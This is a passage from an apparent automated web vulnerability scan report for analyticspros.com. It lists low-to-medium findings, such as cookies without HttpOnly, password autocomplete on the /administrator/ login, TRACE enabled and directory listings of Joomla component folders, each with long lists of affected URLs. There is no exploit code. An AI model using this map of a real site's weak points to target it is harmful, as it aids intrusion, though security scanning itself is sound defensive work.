
4.7. http://www.analyticspros.com/blog/googleanalytics/108-custom-variable-dimensions.html

4.8. http://www.analyticspros.com/blog/googleanalytics/109-google-analytics-training-san-jose-2010.html

4.9. http://www.analyticspros.com/blog/googleanalytics/113-domain-hostname-content-reports.html

4.10. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html

4.11. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

4.12. http://www.analyticspros.com/blog/googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html

4.13. http://www.analyticspros.com/blog/googleanalytics/122-traning-workshop-washington-dc-2010.html

4.14. http://www.analyticspros.com/blog/googleanalytics/62-tracking-actual-adwords-keywords.html

4.15. http://www.analyticspros.com/blog/googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

4.16. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html

4.17. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html

4.18. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html

4.19. http://www.analyticspros.com/blog/googleanalytics/97-workshop-january-29th-dimensionator.html

4.20. http://www.analyticspros.com/blog/googleanalytics/99-unique-keywords-by-month.html

4.21. http://www.analyticspros.com/blog/seo.feed

4.22. http://www.analyticspros.com/blog/seo/59-search-ranking-position-with-ga.html

4.23. http://www.analyticspros.com/blog/seo/78-best-seo-video-matt-cutts-wordpress.html

4.24. http://www.analyticspros.com/blog/urchin/118-urchin-7-now-available.html

4.25. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html

4.26. http://www.analyticspros.com/blog/urchin/75-convert-u5data-error-changing-directories.html

4.27. http://www.analyticspros.com/blog/urchin/88-urchin-vs-google-analytics.html

4.28. http://www.analyticspros.com/blog/webanalytics.html

4.29. http://www.analyticspros.com/consulting.html

4.30. http://www.analyticspros.com/index.php

5. Cross-domain Referer leakage

5.1. http://www.analyticspros.com/blog.html

5.2. http://www.analyticspros.com/blog.html

5.3. http://www.analyticspros.com/blog/55-googleanalytics/103-google-analytics-opt-out-feature.html

5.4. http://www.analyticspros.com/blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html

5.5. http://www.analyticspros.com/blog/55-googleanalytics/113-domain-hostname-content-reports.html

5.6. http://www.analyticspros.com/blog/55-googleanalytics/122-traning-workshop-washington-dc-2010.html

5.7. http://www.analyticspros.com/blog/55-googleanalytics/62-tracking-actual-adwords-keywords.html

5.8. http://www.analyticspros.com/blog/55-googleanalytics/77-refresh-rate-content-metric.html

5.9. http://www.analyticspros.com/blog/55-googleanalytics/86-google-analytics-intelligence.html

5.10. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html

5.11. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html

5.12. http://www.analyticspros.com/blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html

5.13. http://www.analyticspros.com/blog/62-urchin.html

5.14. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html

5.15. http://www.analyticspros.com/blog/62-urchin/75-convert-u5data-error-changing-directories.html

5.16. http://www.analyticspros.com/blog/62-urchin/87-visitor-scoring-with-urchin.html

5.17. http://www.analyticspros.com/blog/62-urchin/88-urchin-vs-google-analytics.html

5.18. http://www.analyticspros.com/blog/62-urchin/94-exclude-bots-in-urchin.html

5.19. http://www.analyticspros.com/blog/googleanalytics.feed

5.20. http://www.analyticspros.com/blog/googleanalytics.html

5.21. http://www.analyticspros.com/blog/googleanalytics.html

5.22. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

5.23. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html

5.24. http://www.analyticspros.com/blog/googleanalytics/108-custom-variable-dimensions.html

5.25. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html

5.26. http://www.analyticspros.com/blog/googleanalytics/122-traning-workshop-washington-dc-2010.html

5.27. http://www.analyticspros.com/blog/googleanalytics/62-tracking-actual-adwords-keywords.html

5.28. http://www.analyticspros.com/blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html

5.29. http://www.analyticspros.com/blog/googleanalytics/68-unobfuscate-gajs-file.html

5.30. http://www.analyticspros.com/blog/googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

5.31. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html

5.32. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html

5.33. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html

5.34. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html

5.35. http://www.analyticspros.com/blog/googleanalytics/97-workshop-january-29th-dimensionator.html

5.36. http://www.analyticspros.com/blog/googleanalytics/99-unique-keywords-by-month.html

5.37. http://www.analyticspros.com/blog/seo.feed

5.38. http://www.analyticspros.com/blog/seo/59-search-ranking-position-with-ga.html

5.39. http://www.analyticspros.com/blog/seo/78-best-seo-video-matt-cutts-wordpress.html

5.40. http://www.analyticspros.com/blog/urchin.html

5.41. http://www.analyticspros.com/blog/urchin/118-urchin-7-now-available.html

5.42. http://www.analyticspros.com/blog/webanalytics.feed

5.43. http://www.analyticspros.com/component/content/article/62-urchin/118-urchin-7-now-available.html

5.44. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html

5.45. http://www.analyticspros.com/component/jsetup/comment/add.html

5.46. http://www.analyticspros.com/index.php

5.47. http://www.analyticspros.com/index.php

5.48. http://www.analyticspros.com/index.php

5.49. http://www.analyticspros.com/index.php

5.50. http://www.analyticspros.com/index.php

5.51. http://www.analyticspros.com/index.php

5.52. http://www.analyticspros.com/index.php

5.53. http://www.analyticspros.com/index.php

5.54. http://www.analyticspros.com/products.html

5.55. http://www.analyticspros.com/products/63-urchin/70-urchin.html

5.56. http://www.analyticspros.com/resources/64-campaign-tracker.html

5.57. http://www.analyticspros.com/resources/90-analytics-toolbar.html

6. Cross-domain script include

6.1. http://www.analyticspros.com/

6.2. http://www.analyticspros.com/about.html

6.3. http://www.analyticspros.com/about/

6.4. http://www.analyticspros.com/about/caleb-whitmore.html

6.5. http://www.analyticspros.com/blog.html

6.6. http://www.analyticspros.com/blog/

6.7. http://www.analyticspros.com/blog/55-googleanalytics.html

6.8. http://www.analyticspros.com/blog/55-googleanalytics/

6.9. http://www.analyticspros.com/blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

6.10. http://www.analyticspros.com/blog/55-googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

6.11. http://www.analyticspros.com/blog/55-googleanalytics/103-google-analytics-opt-out-feature.html

6.12. http://www.analyticspros.com/blog/55-googleanalytics/106-google-analytics-health-check.html

6.13. http://www.analyticspros.com/blog/55-googleanalytics/108-custom-variable-dimensions.html

6.14. http://www.analyticspros.com/blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html

6.15. http://www.analyticspros.com/blog/55-googleanalytics/113-domain-hostname-content-reports.html

6.16. http://www.analyticspros.com/blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html

6.17. http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

6.18. http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html

6.19. http://www.analyticspros.com/blog/55-googleanalytics/122-traning-workshop-washington-dc-2010.html

6.20. http://www.analyticspros.com/blog/55-googleanalytics/60-ga-extended-segments-part-1.html

6.21. http://www.analyticspros.com/blog/55-googleanalytics/62-tracking-actual-adwords-keywords.html

6.22. http://www.analyticspros.com/blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html

6.23. http://www.analyticspros.com/blog/55-googleanalytics/68-unobfuscate-gajs-file.html

6.24. http://www.analyticspros.com/blog/55-googleanalytics/77-refresh-rate-content-metric.html

6.25. http://www.analyticspros.com/blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

6.26. http://www.analyticspros.com/blog/55-googleanalytics/86-google-analytics-intelligence.html

6.27. http://www.analyticspros.com/blog/55-googleanalytics/89-dont-kill-the-messenger.html

6.28. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html

6.29. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html

6.30. http://www.analyticspros.com/blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html

6.31. http://www.analyticspros.com/blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html

6.32. http://www.analyticspros.com/blog/55-googleanalytics/99-unique-keywords-by-month.html

6.33. http://www.analyticspros.com/blog/56-seo/59-search-ranking-position-with-ga.html

6.34. http://www.analyticspros.com/blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html

6.35. http://www.analyticspros.com/blog/62-urchin.html

6.36. http://www.analyticspros.com/blog/62-urchin/

6.37. http://www.analyticspros.com/blog/62-urchin/118-urchin-7-now-available.html

6.38. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html

6.39. http://www.analyticspros.com/blog/62-urchin/75-convert-u5data-error-changing-directories.html

6.40. http://www.analyticspros.com/blog/62-urchin/87-visitor-scoring-with-urchin.html

6.41. http://www.analyticspros.com/blog/62-urchin/88-urchin-vs-google-analytics.html

6.42. http://www.analyticspros.com/blog/62-urchin/94-exclude-bots-in-urchin.html

6.43. http://www.analyticspros.com/blog/googleanalytics.feed

6.44. http://www.analyticspros.com/blog/googleanalytics.html

6.45. http://www.analyticspros.com/blog/googleanalytics/

6.46. http://www.analyticspros.com/blog/googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

6.47. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

6.48. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html

6.49. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html

6.50. http://www.analyticspros.com/blog/googleanalytics/108-custom-variable-dimensions.html

6.51. http://www.analyticspros.com/blog/googleanalytics/109-google-analytics-training-san-jose-2010.html

6.52. http://www.analyticspros.com/blog/googleanalytics/113-domain-hostname-content-reports.html

6.53. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html

6.54. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

6.55. http://www.analyticspros.com/blog/googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html

6.56. http://www.analyticspros.com/blog/googleanalytics/122-traning-workshop-washington-dc-2010.html

6.57. http://www.analyticspros.com/blog/googleanalytics/60-ga-extended-segments-part-1.html

6.58. http://www.analyticspros.com/blog/googleanalytics/62-tracking-actual-adwords-keywords.html

6.59. http://www.analyticspros.com/blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html

6.60. http://www.analyticspros.com/blog/googleanalytics/68-unobfuscate-gajs-file.html

6.61. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html

6.62. http://www.analyticspros.com/blog/googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

6.63. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html

6.64. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html

6.65. http://www.analyticspros.com/blog/googleanalytics/91-google-analytics-cookies-and-domains.html

6.66. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html

6.67. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html

6.68. http://www.analyticspros.com/blog/googleanalytics/97-workshop-january-29th-dimensionator.html

6.69. http://www.analyticspros.com/blog/googleanalytics/99-unique-keywords-by-month.html

6.70. http://www.analyticspros.com/blog/seo.feed

6.71. http://www.analyticspros.com/blog/seo.html

6.72. http://www.analyticspros.com/blog/seo/59-search-ranking-position-with-ga.html

6.73. http://www.analyticspros.com/blog/seo/78-best-seo-video-matt-cutts-wordpress.html

6.74. http://www.analyticspros.com/blog/urchin.feed

6.75. http://www.analyticspros.com/blog/urchin.html

6.76. http://www.analyticspros.com/blog/urchin/

6.77. http://www.analyticspros.com/blog/urchin/118-urchin-7-now-available.html

6.78. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html

6.79. http://www.analyticspros.com/blog/urchin/75-convert-u5data-error-changing-directories.html

6.80. http://www.analyticspros.com/blog/urchin/87-visitor-scoring-with-urchin.html

6.81. http://www.analyticspros.com/blog/urchin/88-urchin-vs-google-analytics.html

6.82. http://www.analyticspros.com/blog/urchin/94-exclude-bots-in-urchin.html

6.83. http://www.analyticspros.com/blog/webanalytics.feed

6.84. http://www.analyticspros.com/blog/webanalytics.html

6.85. http://www.analyticspros.com/component/content/article/62-urchin/118-urchin-7-now-available.html

6.86. http://www.analyticspros.com/component/content/article/62-urchin/function.mysql-connect

6.87. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html

6.88. http://www.analyticspros.com/component/jsetup/

6.89. http://www.analyticspros.com/component/jsetup/comment/

6.90. http://www.analyticspros.com/component/jsetup/comment/add.html

6.91. http://www.analyticspros.com/component/jsetup/comment/function.mysql-connect

6.92. http://www.analyticspros.com/consulting.html

6.93. http://www.analyticspros.com/contact.html

6.94. http://www.analyticspros.com/index.html

6.95. http://www.analyticspros.com/index.php

6.96. http://www.analyticspros.com/products.html

6.97. http://www.analyticspros.com/products/63-urchin.html

6.98. http://www.analyticspros.com/products/63-urchin/

6.99. http://www.analyticspros.com/products/63-urchin/119-urchin-6.html

6.100. http://www.analyticspros.com/products/63-urchin/120-buy-urchin-7-or-upgrade.html

6.101. http://www.analyticspros.com/products/63-urchin/70-urchin.html

6.102. http://www.analyticspros.com/products/63-urchin/85-urchin-hosted.html

6.103. http://www.analyticspros.com/products/64-data-warehouse/

6.104. http://www.analyticspros.com/products/64-data-warehouse/84-analytics-data-warehouse.html

6.105. http://www.analyticspros.com/products/65-ae.html

6.106. http://www.analyticspros.com/products/65-ae/

6.107. http://www.analyticspros.com/products/65-ae/110-analytics-engine.html

6.108. http://www.analyticspros.com/products/analytics-data-warehouse.html

6.109. http://www.analyticspros.com/resources.html

6.110. http://www.analyticspros.com/resources/

6.111. http://www.analyticspros.com/resources/64-campaign-tracker.html

6.112. http://www.analyticspros.com/resources/90-analytics-toolbar.html

6.113. http://www.analyticspros.com/resources/campaign-url-builder.html

6.114. http://www.analyticspros.com/resources/dimensionator-analytics-toolbar.html

6.115. http://www.analyticspros.com/resources/feeds.html

6.116. http://www.analyticspros.com/resources/feeds/

6.117. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/

6.118. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/10-lunametrics-blog.html

6.119. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/13-portent-interactive-blog.html

6.120. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/14-pure-visibility.html

6.121. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html

6.122. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/16-vki-studios-blog.html

6.123. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/17-viget-labs-blog.html

6.124. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/41-webshare-design.html

6.125. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/9-epik-blog.html

6.126. http://www.analyticspros.com/resources/healthcheck/

6.127. http://www.analyticspros.com/training.html

6.128. http://www.analyticspros.com/urchin.html

6.129. http://www.analyticspros.com/urchin/

6.130. http://www.analyticspros.com/urchin/buy.html

6.131. http://www.analyticspros.com/urchin/urchin-6.html

6.132. http://www.analyticspros.com/urchin/urchin-hosting.html

7. Cookie without HttpOnly flag set

7.1. http://www.analyticspros.com/

7.2. http://www.analyticspros.com/about.html

7.3. http://www.analyticspros.com/about/

7.4. http://www.analyticspros.com/about/caleb-whitmore.html

7.5. http://www.analyticspros.com/administrator/

7.6. http://www.analyticspros.com/blog.html

7.7. http://www.analyticspros.com/blog/

7.8. http://www.analyticspros.com/blog/55-googleanalytics.html

7.9. http://www.analyticspros.com/blog/55-googleanalytics/

7.10. http://www.analyticspros.com/blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

7.11. http://www.analyticspros.com/blog/55-googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

7.12. http://www.analyticspros.com/blog/55-googleanalytics/103-google-analytics-opt-out-feature.html

7.13. http://www.analyticspros.com/blog/55-googleanalytics/106-google-analytics-health-check.html

7.14. http://www.analyticspros.com/blog/55-googleanalytics/108-custom-variable-dimensions.html

7.15. http://www.analyticspros.com/blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html

7.16. http://www.analyticspros.com/blog/55-googleanalytics/113-domain-hostname-content-reports.html

7.17. http://www.analyticspros.com/blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html

7.18. http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

7.19. http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html

7.20. http://www.analyticspros.com/blog/55-googleanalytics/122-traning-workshop-washington-dc-2010.html

7.21. http://www.analyticspros.com/blog/55-googleanalytics/60-ga-extended-segments-part-1.html

7.22. http://www.analyticspros.com/blog/55-googleanalytics/62-tracking-actual-adwords-keywords.html

7.23. http://www.analyticspros.com/blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html

7.24. http://www.analyticspros.com/blog/55-googleanalytics/68-unobfuscate-gajs-file.html

7.25. http://www.analyticspros.com/blog/55-googleanalytics/77-refresh-rate-content-metric.html

7.26. http://www.analyticspros.com/blog/55-googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

7.27. http://www.analyticspros.com/blog/55-googleanalytics/86-google-analytics-intelligence.html

7.28. http://www.analyticspros.com/blog/55-googleanalytics/89-dont-kill-the-messenger.html

7.29. http://www.analyticspros.com/blog/55-googleanalytics/91-google-analytics-cookies-and-domains.html

7.30. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html

7.31. http://www.analyticspros.com/blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html

7.32. http://www.analyticspros.com/blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html

7.33. http://www.analyticspros.com/blog/55-googleanalytics/99-unique-keywords-by-month.html

7.34. http://www.analyticspros.com/blog/56-seo/59-search-ranking-position-with-ga.html

7.35. http://www.analyticspros.com/blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html

7.36. http://www.analyticspros.com/blog/62-urchin.html

7.37. http://www.analyticspros.com/blog/62-urchin/

7.38. http://www.analyticspros.com/blog/62-urchin/118-urchin-7-now-available.html

7.39. http://www.analyticspros.com/blog/62-urchin/121-urchin-7-new-interface-first-look.html

7.40. http://www.analyticspros.com/blog/62-urchin/75-convert-u5data-error-changing-directories.html

7.41. http://www.analyticspros.com/blog/62-urchin/87-visitor-scoring-with-urchin.html

7.42. http://www.analyticspros.com/blog/62-urchin/88-urchin-vs-google-analytics.html

7.43. http://www.analyticspros.com/blog/62-urchin/94-exclude-bots-in-urchin.html

7.44. http://www.analyticspros.com/blog/googleanalytics.feed

7.45. http://www.analyticspros.com/blog/googleanalytics.html

7.46. http://www.analyticspros.com/blog/googleanalytics/

7.47. http://www.analyticspros.com/blog/googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

7.48. http://www.analyticspros.com/blog/googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

7.49. http://www.analyticspros.com/blog/googleanalytics/103-google-analytics-opt-out-feature.html

7.50. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html

7.51. http://www.analyticspros.com/blog/googleanalytics/108-custom-variable-dimensions.html

7.52. http://www.analyticspros.com/blog/googleanalytics/109-google-analytics-training-san-jose-2010.html

7.53. http://www.analyticspros.com/blog/googleanalytics/113-domain-hostname-content-reports.html

7.54. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html

7.55. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

7.56. http://www.analyticspros.com/blog/googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html

7.57. http://www.analyticspros.com/blog/googleanalytics/122-traning-workshop-washington-dc-2010.html

7.58. http://www.analyticspros.com/blog/googleanalytics/60-ga-extended-segments-part-1.html

7.59. http://www.analyticspros.com/blog/googleanalytics/62-tracking-actual-adwords-keywords.html

7.60. http://www.analyticspros.com/blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html

7.61. http://www.analyticspros.com/blog/googleanalytics/68-unobfuscate-gajs-file.html

7.62. http://www.analyticspros.com/blog/googleanalytics/77-refresh-rate-content-metric.html

7.63. http://www.analyticspros.com/blog/googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html

7.64. http://www.analyticspros.com/blog/googleanalytics/86-google-analytics-intelligence.html

7.65. http://www.analyticspros.com/blog/googleanalytics/89-dont-kill-the-messenger.html

7.66. http://www.analyticspros.com/blog/googleanalytics/91-google-analytics-cookies-and-domains.html

7.67. http://www.analyticspros.com/blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html

7.68. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html

7.69. http://www.analyticspros.com/blog/googleanalytics/97-workshop-january-29th-dimensionator.html

7.70. http://www.analyticspros.com/blog/googleanalytics/99-unique-keywords-by-month.html

7.71. http://www.analyticspros.com/blog/seo.feed

7.72. http://www.analyticspros.com/blog/seo.html

7.73. http://www.analyticspros.com/blog/seo/59-search-ranking-position-with-ga.html

7.74. http://www.analyticspros.com/blog/seo/78-best-seo-video-matt-cutts-wordpress.html

7.75. http://www.analyticspros.com/blog/urchin.feed

7.76. http://www.analyticspros.com/blog/urchin.html

7.77. http://www.analyticspros.com/blog/urchin/

7.78. http://www.analyticspros.com/blog/urchin/118-urchin-7-now-available.html

7.79. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html

7.80. http://www.analyticspros.com/blog/urchin/75-convert-u5data-error-changing-directories.html

7.81. http://www.analyticspros.com/blog/urchin/87-visitor-scoring-with-urchin.html

7.82. http://www.analyticspros.com/blog/urchin/88-urchin-vs-google-analytics.html

7.83. http://www.analyticspros.com/blog/urchin/94-exclude-bots-in-urchin.html

7.84. http://www.analyticspros.com/blog/webanalytics.feed

7.85. http://www.analyticspros.com/blog/webanalytics.html

7.86. http://www.analyticspros.com/component/content/article/62-urchin/118-urchin-7-now-available.html

7.87. http://www.analyticspros.com/component/content/article/62-urchin/function.mysql-connect

7.88. http://www.analyticspros.com/component/content/article/65-ae/110-analytics-engine.html

7.89. http://www.analyticspros.com/component/jsetup/

7.90. http://www.analyticspros.com/component/jsetup/comment/

7.91. http://www.analyticspros.com/component/jsetup/comment/add.html

7.92. http://www.analyticspros.com/component/jsetup/comment/function.mysql-connect

7.93. http://www.analyticspros.com/consulting.html

7.94. http://www.analyticspros.com/contact.html

7.95. http://www.analyticspros.com/index.html

7.96. http://www.analyticspros.com/index.php

7.97. http://www.analyticspros.com/products.html

7.98. http://www.analyticspros.com/products/63-urchin.html

7.99. http://www.analyticspros.com/products/63-urchin/

7.100. http://www.analyticspros.com/products/63-urchin/119-urchin-6.html

7.101. http://www.analyticspros.com/products/63-urchin/120-buy-urchin-7-or-upgrade.html

7.102. http://www.analyticspros.com/products/63-urchin/70-urchin.html

7.103. http://www.analyticspros.com/products/63-urchin/85-urchin-hosted.html

7.104. http://www.analyticspros.com/products/64-data-warehouse/

7.105. http://www.analyticspros.com/products/64-data-warehouse/84-analytics-data-warehouse.html

7.106. http://www.analyticspros.com/products/65-ae.html

7.107. http://www.analyticspros.com/products/65-ae/

7.108. http://www.analyticspros.com/products/65-ae/110-analytics-engine.html

7.109. http://www.analyticspros.com/products/analytics-data-warehouse.html

7.110. http://www.analyticspros.com/resources.html

7.111. http://www.analyticspros.com/resources/

7.112. http://www.analyticspros.com/resources/64-campaign-tracker.html

7.113. http://www.analyticspros.com/resources/90-analytics-toolbar.html

7.114. http://www.analyticspros.com/resources/campaign-url-builder.html

7.115. http://www.analyticspros.com/resources/dimensionator-analytics-toolbar.html

7.116. http://www.analyticspros.com/resources/feeds.html

7.117. http://www.analyticspros.com/resources/feeds/

7.118. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/

7.119. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/10-lunametrics-blog.html

7.120. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/13-portent-interactive-blog.html

7.121. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/14-pure-visibility.html

7.122. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/15-roi-revolution-blog.html

7.123. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/16-vki-studios-blog.html

7.124. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/17-viget-labs-blog.html

7.125. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/41-webshare-design.html

7.126. http://www.analyticspros.com/resources/feeds/34-gaac-blogs/9-epik-blog.html

7.127. http://www.analyticspros.com/resources/healthcheck/

7.128. http://www.analyticspros.com/training.html

7.129. http://www.analyticspros.com/urchin.html

7.130. http://www.analyticspros.com/urchin/

7.131. http://www.analyticspros.com/urchin/buy.html

7.132. http://www.analyticspros.com/urchin/urchin-6.html

7.133. http://www.analyticspros.com/urchin/urchin-hosting.html

7.134. http://www.analyticspros.com/xmlrpc/

8. Password field with autocomplete enabled

8.1. http://www.analyticspros.com/administrator/

8.2. http://www.analyticspros.com/administrator/index.php

9. File upload functionality

10. TRACE method is enabled

11. Directory listing

11.1. http://www.analyticspros.com/components/com_chronocontact/css/

11.2. http://www.analyticspros.com/components/com_chronocontact/css/images/

11.3. http://www.analyticspros.com/components/com_chronocontact/css/img/

11.4. http://www.analyticspros.com/components/com_chronocontact/js/

11.5. http://www.analyticspros.com/components/com_chronocontact/themes/

11.6. http://www.analyticspros.com/components/com_chronocontact/themes/default/

11.7. http://www.analyticspros.com/components/com_chronocontact/themes/default/css/

11.8. http://www.analyticspros.com/components/com_chronocontact/themes/theme1/

11.9. http://www.analyticspros.com/components/com_chronocontact/themes/theme1/css/

11.10. http://www.analyticspros.com/components/com_fpss/

11.11. http://www.analyticspros.com/modules/mod_fpss/

11.12. http://www.analyticspros.com/modules/mod_fpss/includes/

11.13. http://www.analyticspros.com/modules/mod_fpss/includes/elements/

11.14. http://www.analyticspros.com/modules/mod_fpss/includes/engines/

11.15. http://www.analyticspros.com/modules/mod_fpss/includes/images/

11.16. http://www.analyticspros.com/modules/mod_fpss/tmpl/

11.17. http://www.analyticspros.com/modules/mod_fpss/tmpl/Default/

11.18. http://www.analyticspros.com/modules/mod_fpss/tmpl/Default/images/

11.19. http://www.analyticspros.com/modules/mod_fpss/tmpl/Default/psd/

11.20. http://www.analyticspros.com/modules/mod_fpss/tmpl/FSD/

11.21. http://www.analyticspros.com/modules/mod_fpss/tmpl/FSD/images/

11.22. http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Obs/

11.23. http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Obs/images/

11.24. http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Rasper/

11.25. http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Rasper/images/

11.26. http://www.analyticspros.com/modules/mod_fpss/tmpl/Movies/

11.27. http://www.analyticspros.com/modules/mod_fpss/tmpl/Movies/images/

11.28. http://www.analyticspros.com/modules/mod_fpss/tmpl/Sleek/

11.29. http://www.analyticspros.com/modules/mod_fpss/tmpl/Sleek/images/

11.30. http://www.analyticspros.com/modules/mod_fpss/tmpl/Sleek/psd/

11.31. http://www.analyticspros.com/modules/mod_fpss/tmpl/TT/

11.32. http://www.analyticspros.com/modules/mod_fpss/tmpl/TT/images/

11.33. http://www.analyticspros.com/modules/mod_fpss/tmpl/Uncut/

11.34. http://www.analyticspros.com/modules/mod_fpss/tmpl/Uncut/images/

11.35. http://www.analyticspros.com/plugins/system/pc_includes/

11.36. http://www.analyticspros.com/templates/apros2.0/images/header/

11.37. http://www.analyticspros.com/templates/apros2.0/js/

11.38. http://www.analyticspros.com/templates/apros2.0/styles/elements/green/

11.39. http://www.analyticspros.com/templates/apros2.0/styles/elements/green/images/

12. Email addresses disclosed

13. Robots.txt file

14. HTML does not specify charset

14.1. http://www.analyticspros.com/about/

14.2. http://www.analyticspros.com/about/caleb-whitmore.html

14.3. http://www.analyticspros.com/administrator/templates/

14.4. http://www.analyticspros.com/administrator/templates/khepri/

14.5. http://www.analyticspros.com/administrator/templates/khepri/css/

14.6. http://www.analyticspros.com/administrator/templates/system/

14.7. http://www.analyticspros.com/administrator/templates/system/css/

14.8. http://www.analyticspros.com/blog.html.

14.9. http://www.analyticspros.com/blog/

14.10. http://www.analyticspros.com/blog/55-googleanalytics.html

14.11. http://www.analyticspros.com/blog/55-googleanalytics/

14.12. http://www.analyticspros.com/blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

14.13. http://www.analyticspros.com/blog/55-googleanalytics/101-dimensionator-day-of-week-month-date-analysis.html

14.14. http://www.analyticspros.com/blog/55-googleanalytics/103-google-analytics-opt-out-feature.html

14.15. http://www.analyticspros.com/blog/55-googleanalytics/106-google-analytics-health-check.html

14.16. http://www.analyticspros.com/blog/55-googleanalytics/108-custom-variable-dimensions.html

14.17. http://www.analyticspros.com/blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html

